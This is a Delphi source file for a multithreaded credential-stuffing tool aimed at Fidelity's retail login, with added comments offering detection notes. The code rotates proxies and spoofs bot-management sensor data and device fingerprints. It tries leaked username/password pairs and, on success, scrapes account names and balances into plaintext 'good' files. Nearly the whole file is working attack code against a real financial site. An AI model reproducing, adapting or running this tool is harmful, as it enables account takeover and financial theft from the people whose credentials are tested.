- unit BruteAppThread;
- interface
- uses
- System.Classes, SyncObjs, VCL.Dialogs, synachar, ssl_openssl, Math,
- httpsend, synautil, synsock, blcksock, SysUtils, RegExpr;
- type
// TManualThread: worker thread (TThread descendant) declared by this unit.
// Going by the methods implemented below, each instance takes entries from a
// shared credential list (AccountList), sends its traffic through an entry of
// ProxyList and submits the credentials to a third-party login endpoint, i.e.
// automated credential testing (credential stuffing).
// For defenders, the artefacts this unit leaves are the fixed request header
// set, the largely constant DEVICE_PRINT fields and the plaintext result files
// written in Sync.
- TManualThread = class(TThread)
- strict private
// HTTP client and scratch buffers; created and freed per list entry in Execute.
- HTTP: THTTPSend;
- Pagedata: TStringList;
- JSON: TStringStream;
// Of these strings only UserName, Password, send_AppVersion, DevicePrint and
// UserCheck are referenced in this unit. send_AppVersion is read in
// WorkingThread but never assigned in the visible code.
- PKId, URLText, Bio, UserName, Password, DeviceSign, send_timezone,
- send_height, send_width, send_availHeight, send_AppVersion, Send_productSub,
- DevicePrint, UserCheck: String;
// Regex engine used in WorkingThread to pull fields out of a fetched page.
- Reg: TRegExpr;
// Splits one list entry into user and password parts.
- procedure DelimitUser(Str: string; out User, Pass: string);
- protected
// fAcc / fProxy: indexes into AccountList / ProxyList claimed by this thread.
// ThreadResult: outcome code consumed by Sync (1 -> GoodFile, 2 -> BadFile,
// 3 -> SecurityFile); 0 is set on the "Technical Issue" page. No visible code
// assigns 3.
- fAcc, fProxy, ThreadResult: Integer;
// Host and port of the proxy entry in use, split from "host:port".
- fPrAddr, fPrPort: string;
// One attempt for the current credentials; Execute repeats it until True.
- function WorkingThread: Boolean;
- procedure Execute; override;
// Increments the shared connection-error counter (nothing random about it).
- procedure MakeSomeRandomError;
// Records the outcome; invoked through Synchronize from Execute.
- procedure Sync;
- end;
- implementation
- uses BruteAppUnit;
// DelimitUser: splits a credential-list entry into User and Pass.
// The separator is the first ';' if the entry contains one, otherwise the
// first ':'. Everything from the first '@' onward is then dropped from User,
// so an e-mail style login is reduced to its local part.
// Str  - raw list entry.
// User - out: text before the separator, truncated at '@'.
// Pass - out: text after the separator.
- procedure TManualThread.DelimitUser(Str: string; out User, Pass: string);
- begin
- if Pos(';', Str) <> 0 then
- begin
- User := Copy(Str, 1, Pos(';', Str) - 1);
- Pass := Copy(Str, Pos(';', Str) + 1, Length(Str));
- end
- else
- begin
// No ';' present: fall back to ':' as the separator.
- User := Copy(Str, 1, Pos(':', Str) - 1);
- Pass := Copy(Str, Pos(':', Str) + 1, Length(Str));
- end;
- if Pos('@', User) <> 0 then User := Copy(User, 1, Pos('@', User) - 1);
- end;
// Execute: thread body. Loops while the shared flag Working is set, claiming
// the next index of AccountList on each pass and running one credential test
// for that entry.
// Working, Acc, CS and AccountList are not declared in this unit; presumably
// they are globals of BruteAppUnit - confirm against that unit.
- procedure TManualThread.Execute;
- var
- fBool: Boolean;
- begin
- while Working do
- begin
// The shared index is advanced under the critical section CS; Working is
// cleared once the incremented index reaches AccountList.Count - 1.
- CS.Enter;
- Inc(Acc);
- if AccountList.Count -1 <= Acc then Working := False else fAcc := Acc;
- CS.Leave;
- if Working then
- begin
// Fresh HTTP client and buffers for every entry, freed at the end of the pass.
- HTTP := THTTPSend.Create;
- Pagedata := TStringList.Create;
- JSON := TStringStream.Create;
- DelimitUser(AccountList[fAcc], UserName, Password);
- Reg := TRegExpr.Create;
- UserCheck := '';
// Entries with a user part shorter than 5 characters or an empty password are
// not sent anywhere; they are recorded with result code 2.
- if (Length(UserName) >= 5) and (Password <> '') then
- begin
// WorkingThread is repeated until it returns True; no attempt cap or delay is
// visible here. Each call takes the next ProxyList entry, so for a defender the
// same username can arrive again from a different source address.
- repeat
- fBool := WorkingThread;
- until fBool;
- end
- else ThreadResult := 2;
// Outcome is recorded through Synchronize (see Sync).
- Synchronize(Sync);
- Reg.Free;
- HTTP.Free;
- Pagedata.Free;
- JSON.Free;
- end;
- end;
- end;
// MakeSomeRandomError: increments the shared counter Help.ConnectError under
// the critical section CS. Despite the name it involves no randomness; it is
// called from WorkingThread when a request fails or a page reports a
// technical issue.
- procedure TManualThread.MakeSomeRandomError;
- begin
- CS.Enter;
- Inc(Help.ConnectError);
- CS.Leave;
- end;
// Sync: records the outcome of the current entry according to ThreadResult.
// Called via Synchronize from Execute. GoodFile, BadFile, SecurityFile, Item
// and Help are not declared in this unit (presumably BruteAppUnit - confirm).
// For incident response: all three files receive "user;password" in plaintext,
// and the "good" file additionally holds the text collected in UserCheck.
- procedure TManualThread.Sync;
- begin
- case ThreadResult of
// 1: counted as good; credentials, the UserCheck text and a separator line are
// appended to GoodFile, and the pair is added to the form's ResultList.
- 1: begin
- Inc(Help.Good);
- Append(GoodFile);
- Writeln(GoodFile, UserName + ';' + Password);
- Writeln(GoodFile, UserCheck);
- Writeln(GoodFile, '******************************************');
- CloseFile(GoodFile);
- Item := BruteAppForm.ResultList.Items.Add;
- Item.Caption := UserName;
- Item.SubItems.Add(Password);
- end;
// 2: counted as bad; credentials appended to BadFile.
- 2: begin
- Inc(Help.Bad);
- Append(BadFile);
- Writeln(BadFile, UserName + ';' + Password);
- CloseFile(BadFile);
- end;
// 3: counted under Help.Good2FA and appended to SecurityFile. Nothing in the
// visible unit sets ThreadResult to 3.
- 3: begin
- Inc(Help.Good2FA);
- Append(SecurityFile);
- Writeln(SecurityFile, UserName + ';' + Password);
- CloseFile(SecurityFile);
- end;
- end;
- end;
// URLDecode: despite its name this function percent-ENCODES. It replaces each
// character of a fixed list with its %XX form and returns the result.
// '%' itself is not in the list, so percent signs already present in Str pass
// through unchanged.
// Used in WorkingThread on cookie values. The call Help.URLDecode(...) further
// down is a different routine that is not visible in this unit.
- function URLDecode(Str: String): String;
- var
- DynStr: String;
- begin
- DynStr := Str;
- DynStr := StringReplace(DynStr, '!', '%21', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '#', '%23', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '$', '%24', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '&', '%26', [rfReplaceAll]);
// #39 is the single-quote character.
- DynStr := StringReplace(DynStr, #39, '%27', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '*', '%2A', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '+', '%2B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ',', '%2C', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '/', '%2F', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ':', '%3A', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ';', '%3B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '=', '%3D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '?', '%3F', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '@', '%40', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '[', '%5B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ']', '%5D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '{', '%7B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '"', '%22', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '}', '%7D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ' ', '%20', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '\', '%5C', [rfReplaceAll]);
- Result := DynStr;
- end;
// WorkingThread: one attempt for the current UserName/Password through the next
// ProxyList entry. Execute calls it repeatedly until it returns True.
// Stages, as visible below:
//   1. GET the site home page through the proxy.
//   2. Send the collected cookies to a helper service on localhost (direct, no
//      proxy) and read a "sensor_data" value from its reply.
//   3. POST that value to the site's /_bm/_data path and look for '_abck=' in
//      the response headers. This looks like a bot-management sensor/cookie
//      exchange - confirm.
//   4. GET the login init URL, then POST the credentials together with a
//      synthetic DEVICE_PRINT string.
//   5. Classify the reply; on success fetch the portfolio page and copy
//      account-name and balance text into UserCheck.
// Result is set to True once the '_abck=' check passes and on the recognised
// success / wrong-username replies; it is set to False on the "Technical
// Issue" page.
// Detection notes for defenders: the request headers are a fixed set, most
// DEVICE_PRINT fields are constants, and the same username may be retried from
// a different source address on each call.
- function TManualThread.WorkingThread: Boolean;
- var
- RandomArrInd, I: Integer;
- Sensor, Cook: String;
- begin
// Reset buffers and HTTP client state left over from a previous call.
- JSON.Clear;
- Pagedata.Clear;
- HTTP.Document.Clear;
- HTTP.Cookies.Clear;
- HTTP.Headers.Clear;
// Round-robin proxy selection: the shared index Proxy is advanced under CS and
// wraps to 0 near the end of ProxyList.
- CS.Enter;
- Inc(Proxy); if ProxyList.Count -1 <= Proxy then Proxy := 0; fProxy := Proxy;
- CS.Leave;
// Proxy entries are "host:port".
- fPrAddr := Copy(ProxyList[fProxy], 1, Pos(':', ProxyList[fProxy]) - 1);
- fPrPort := Copy(ProxyList[fProxy], Pos(':', ProxyList[fProxy]) + 1, Length(ProxyList[fProxy]));
// fProxyType (declared elsewhere): 0 = HTTP proxy, 1 = SOCKS4, anything else = SOCKS5.
- if fProxyType = 0 then
- begin
- HTTP.ProxyHost := fPrAddr;
- HTTP.ProxyPort := fPrPort;
- end
- else if fProxyType = 1 then
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks4;
- end
- else
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks5;
- end;
- HTTP.AddPortNumberToHost := False;
- HTTP.Protocol := '1.1';
// Random index (used later for the Windows[] table) and a random User-Agent
// from the UserAgents table; both tables are declared outside this unit.
- RandomArrInd := Random(15);
- HTTP.UserAgent := UserAgents[Random(35)][0];
// Fixed header set for the first request. The strings are added exactly as
// written, with no space after the colon - TODO confirm whether the HTTP
// library normalises them on the wire.
- HTTP.Headers.Add('Purpose:prefetch');
- HTTP.Headers.Add('Upgrade-Insecure-Requests:1');
- HTTP.Headers.Add('Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8');
// Stage 1: home page through the proxy; anything but HTTP 200 counts as a
// connection error (final else branch).
- if (HTTP.HTTPMethod('GET', 'https://www.fidelity.com/')) and (HTTP.ResultCode = 200) then
- begin
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- (* HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.HTTPMethod('GET', 'https://www.fidelity.com/_bm/bd-1-30');
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.HTTPMethod('GET', 'https://dpesb.fidelity.com/ftgw/dpdirect/measurement/visitoridentification/v1'); *)
// Proxy settings are cleared so that the next request (to localhost) is sent
// directly.
- HTTP.ProxyHost := '';
- HTTP.ProxyPort := '';
- HTTP.Sock.SocksIP := '';
- HTTP.Sock.SocksPort := '';
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
// Cookie jar is serialised as cookie0=...&cookie1=... with values passed
// through the local URLDecode (which percent-encodes). Exceptions here are
// swallowed.
- try
- for RandomArrInd := 0 to HTTP.Cookies.Count - 1 do
- begin
- if Cook <> '' then Cook := Cook + '&';
- Cook := Cook + 'cookie' + IntToStr(RandomArrInd) + '=' + URLDecode(HTTP.Cookies[RandomArrInd]);
- end;
- JSON.WriteString(Cook);
- except
- end;
- HTTP.Document.LoadFromStream(JSOn);
- HTTP.MimeType := 'application/x-www-form-urlencoded';
// Stage 2: the helper service on localhost is not part of this file;
// presumably it produces the sensor payload - confirm.
- if HTTP.HTTPMethod('POST', 'http://localhost:80/fidelity') then
- begin
- Pagedata.LoadFromStream(HTTP.Document);
- Sensor := Help.Pars('"sensor_data":"', Pagedata.Text, '"}');
// Fixed substring rewrites applied to the returned payload. What the individual
// fields mean is not established by this file.
- Sensor := StringReplace(Sensor, '2883', '12147', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'cwen:0', 'cwen:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'wrc:0', 'wrc:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'vib:0', 'vib:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'bat:0', 'bat:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'do_dis', 'do_en', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'dm_dis', 'dm_en', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'Gecko,-1', 'Gecko,3', [rfReplaceAll]);
- end;
// Proxy settings restored for the remaining requests to the target site.
- if fProxyType = 0 then
- begin
- HTTP.ProxyHost := fPrAddr;
- HTTP.ProxyPort := fPrPort;
- end
- else if fProxyType = 1 then
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks4;
- end
- else
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks5;
- end;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- JSON.Clear;
// Request body for stage 3: the sensor value wrapped in a small JSON object,
// plus a fixed 'ia=1' cookie.
- HTTP.Cookies.Add('ia=1');
- JSON.WriteString('{"sensor_data":"' + Sensor + '"}');
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
// Operator override: when the form's checkbox is ticked, the text of sEdit1 is
// added as a cookie and replaces the request body.
- if BruteAppForm.sCheckBox1.Checked then
- begin
- HTTP.Cookies.Add(BruteAppForm.sEdit1.Text);
- JSON.Clear;
- JSON.WriteString(BruteAppForm.sEdit1.Text);
- end;
- HTTP.Document.LoadFromStream(JSON);
- HTTP.MimeType := 'text/plain;charset=UTF-8';
- HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.Headers.Add('Accept-Language:en-US,en;q=0.9');
- HTTP.KeepAliveTimeout := 0;
// Stage 3: post the payload; the check that follows only looks for '_abck=' in
// the response headers.
- if HTTP.HTTPMethod('POST', 'https://www.fidelity.com/_bm/_data') then
- begin
- if Pos('_abck=', HTTP.Headers.Text) <> 0 then
- begin
// Result and ThreadResult are set to True / 1 at this point, before any
// credential has been submitted.
- Result := True;
- ThreadResult := 1;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
// Stage 4: login init page, then the credential POST.
- if HTTP.HTTPMethod('GET', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Init/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
- begin
- HTTP.Headers.Clear;
- HTTp.Document.Clear;
// Synthetic device-print string. Apart from the User-Agent, the Windows[] table
// values and send_AppVersion, every field is a constant (version, colour depth
// 24, timezone -8, en-US, plugin list, Windows/Chrome), so the same values recur
// across requests - a correlation point for detection.
- DevicePrint := 'version=3.5.2_2&pm_fpua=' + LowerCase(HTTP.UserAgent) + '|' + send_AppVersion + ' |Win32&pm_fpsc=24'+
- '|' + Windows[RandomArrInd][0] + '|' + Windows[RandomArrInd][1] + '|' + Windows[RandomArrInd][2] + '&pm_fpsw=&pm_fptz=-8&pm_fpln=lang=en-US|syslang=|userlang=&pm_fpjv=0&pm_fpco=1'+
- '&pm_fpasw=internal-pdf-viewer|mhjfbmdgcfjbbpaeojofohoefgiehjai|internal-nacl-plugin&pm_fpan=Netscape&pm_fpacn=Mozilla&pm_fpol=true&pm_fposp=&pm_fpup=&pm_fpsaw=' + Windows[RandomArrInd][0] + '&pm_fpspd=24&pm_fpsbd=&pm_fpsdx='+
- '&pm_fpsdy=&pm_fpslx=&pm_fpsly=&pm_fpsfse=&pm_fpsui=&pm_os=Windows&pm_brmjv=' + Help.Pars('Chrome/', HTTP.UserAgent, '.') + '&pm_br=Chrome&pm_inpt=&pm_expt=';
- JSOn.Clear;
// Form body: UserName goes into the SSN field and Password into PIN. Only
// DevicePrint is passed through Help.URLDecode; the credentials are
// concatenated as they are.
- JSON.WriteString('DEVICE_PRINT=' + Help.URLDecode(DevicePrint) + '&SSN=' + Username + '&SavedIdInd=N&PIN=' + Password);
- HTTP.Document.LoadFromStream(JSON);
- HTTP.Headers.Add('Accept:application/json, text/javascript, */*; q=0.01');
- HTTP.MimeType := 'application/x-www-form-urlencoded; charset=UTF-8';
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- if HTTP.HTTPMethod('POST', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Response/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
- begin
// Stage 5: classify the login reply by substring match.
- Pagedata.LoadFromStream(HTTP.Document);
- if Pos('"result": "success"', Pagedata.Text) <> 0 then
- begin
- Result := True;
- ThreadResult := 1;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- Pagedata.Clear;
// After a successful login the portfolio page is fetched and, for every regex
// match, the account name (markup flagged data-pii="true") and balance text are
// appended to UserCheck, which Sync writes to the "good" file. For the victim
// this is exposure of account data, not only of the credential.
- if HTTP.HTTPMethod('GET', 'https://oltx.fidelity.com/ftgw/fbc/oftop/portfolio#summary') then
- begin
- Pagedata.LoadFromStream(HTTP.Document);
- Reg.Expression := 'js-account"(.*?)data-today-change-pct-value="">';
- if Reg.Exec(Pagedata.Text) then
- repeat
- if UserCheck <> '' then UserCheck := UserCheck + #13#10;
- UserCheck := UserCheck + Trim(Help.Pars('account-name" data-pii="true">', Reg.Match[1], '<')) + ' ' + Trim(Help.Pars('js-acct-balance">', Reg.Match[1], '<'));
- until not Reg.ExecNext;
- end;
- end
// Technical-issue page: counted as a connection error; Result is False, so
// Execute calls WorkingThread again.
- else if Pos('<title>We are Sorry. There was a Technical Issue.</title>', Pagedata.Text) <> 0 then
- begin
- MakeSomeRandomError;
- Result := False;
- ThreadResult := 0;
// Username error message in the reply: attempt finished, recorded as bad (2).
- end else if Pos('Error:</strong> The username', Pagedata.Text) <> 0 then
- begin
- Result := True;
- ThreadResult := 2;
- end;
- end
- else MakeSomeRandomError;
- end
- else MakeSomeRandomError;
// No '_abck=' in the response headers: counted under Help.InternalErrors.
- end else begin
- CS.Enter;
- Inc(help.InternalErrors);
- CS.Leave;
- end;
- end
- else MakeSomeRandomError;
- end
- else MakeSomeRandomError;
- end;
- end.